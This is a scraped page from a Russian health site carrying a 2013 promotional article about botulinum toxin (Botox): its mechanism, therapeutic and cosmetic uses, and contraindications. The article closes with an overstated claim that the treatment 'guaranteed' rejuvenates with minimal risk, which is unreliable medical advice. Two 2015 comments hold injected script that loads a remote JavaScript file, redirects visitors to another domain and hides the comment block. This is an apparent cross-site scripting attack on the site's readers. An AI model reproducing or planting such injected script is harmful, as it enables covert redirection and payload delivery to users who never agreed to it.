Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Как сделать себя красивой...  >>  Как сделать себя красивой? Ботокс
 
Обратная связь
 

Как сделать себя красивой? Ботокс

Размер шрифта
24 декабря 2013 00:00
  • google_analytics: false
  • Нравится

Косметология и пластическая хирургия – самые мистифицированные отрасли медицины. Количество мифов, предрассудков и досужих домыслов там просто зашкаливает. Ярким примером является ботулинический токсин, или ботокс – это название знают даже бабушки, сидящие около подъездов на лавочках, а вот что это такое и зачем он нужен – эти аспекты для большинства являются загадкой.

Как сделать себя красивой? Ботокс

Для начала определимся с терминологией. Ботокс – это коммерческое название самого первого препарата ботулинического токсина. Он оказался настолько революционным, что название пошло в народ и стало нарицательным. Однако на рынке присутствует огромное количество других торговых наименований: Ксеомин, Лантокс и многие-многие другие. Поэтому далее мы, справедливости ради, будем использовать международное непатентованное наименование – ботулотоксин.

Цербер на привязи

Ботулотоксин – это нейропаралитический яд, который многие столетия убивал людей. Но современные ученные смогли изучить его и приручить.

Чтобы понять, как мы «докатились» до использования смертоносного яда в медицинских целях, нужно разобраться, как он действует.

Проникая в нервные клетки, он препятствует образованию вещества под названием «ацетилхолин», без которого невозможна адекватная передача нервных импульсов, в первую очередь к мышцам.

Ученые предположили, что если использовать минимальные дозы ботулотоксина, то можно получить необходимый терапевтический эффект в тех ситуациях, когда мышцы спазмированы и их необходимо расслабить, при этом избежав негативных побочных эффектов. Косоглазие, блефароспазм, спастический паралич при повреждении центрального мотонейрона – вот лишь несколько примеров заболеваний, при лечении которых успешно применяется ботулотоксин.

Дальше стало еще интереснее: оказалось, что ацетилхолин также стимулирует секрецию потовых желез! Поэтому ботулотоксин начали более чем успешно применять для лечения повышенного потоотделения (гипергидроза) – патологии, психологически мучительной для огромного количества людей.

Однако на этом триумфальное шествие ботулотоксина не закончилась: другая революция не заставила себя долго ждать.

Убийственная красота

Однажды ученые заметили, что при лечении блефароспазма (патологического сокращения век) с помощью ботулотоксина разглаживаются морщины вокруг глаз. Ученые решили, что это связано с расслаблением мимических мышц. Возник закономерный вопрос: можно ли, в таком случае, использовать ботулотоксин в косметических целях? Положительный ответ на него произвел настоящий фурор.

Сегодня с помощью ботулотоксина косметологи решают огромное количество задач, омолаживая лицо с легкостью, без единого надреза. Перечислим лишь некоторые из них:

  • Коррекция гиперфункциональных мимических морщин (то есть тех, что могут появиться даже в молодости; излюбленная локализация – лоб, межбровье и область вокруг глаз)
  • Неоперативный лифтинг бровей
  • Ринокосметологические процедуры: с помощью ботулотоксина можно поднять кончик носа, сузить ноздри и так далее
  • Коррекция овала лица
  • Восстановление эластичности подкожной мышцы шеи

И многое-многое другое – список поистине необъятный.

Новые перспективы

Конечно, не все так радужно. Во-первых, у ботулотоксина, как и у любого эффективного препарата, есть противопоказания, к числу которых относятся миастения, беременность и кормление грудью, онкологические заболевания, гепатит, аллергические реакции на препарат, хронические обструктивные заболевания легких, нарушения свертываемости крови и некоторые другие. Во-вторых, ранние препараты ботулотоксина обладали рядом существенных недостатков: они были капризны с точки зрения условий хранения, со временем к ним нередко развивалась невосприимчивость и другое.

К счастью, сегодня существует более продвинутый вариант ботулотоксина высокой степени очищенности. Отсутствие сторонних белковых молекул в препарате делает его намного более стабильным (скажем, его можно хранить при комнатной температуре в течение аж трех лет!) и безопасным для применения.

В любом случае, не бойтесь ботулинотерапию! Это современная прогрессивная косметологическая методика, которая гарантированно позволит сбросить лишние годы с вашего лица с минимальным риском для здоровья.

Другие секреты женской красоты щедро раскрываются на страницах нашего специального проекта «Хочу быть красивой».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:49

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:49

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
У вас обвиснет грудь! Из-за этих привычек!   Кормите детей грудью – спасите СЕБЯ от старческого слабоумия   Каким молоком кормить вашего малыша?   Как обследовать свою грудь?  
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 03 октября 2013Результаты благотворительного марафона «Всем миром»
 

Слайдшоу

1
Как увеличить грудное молоко?
Все самые странные факты о грудном молоке
Как правильно кормить грудью

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Что вы знаете о грудном вскармливании?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.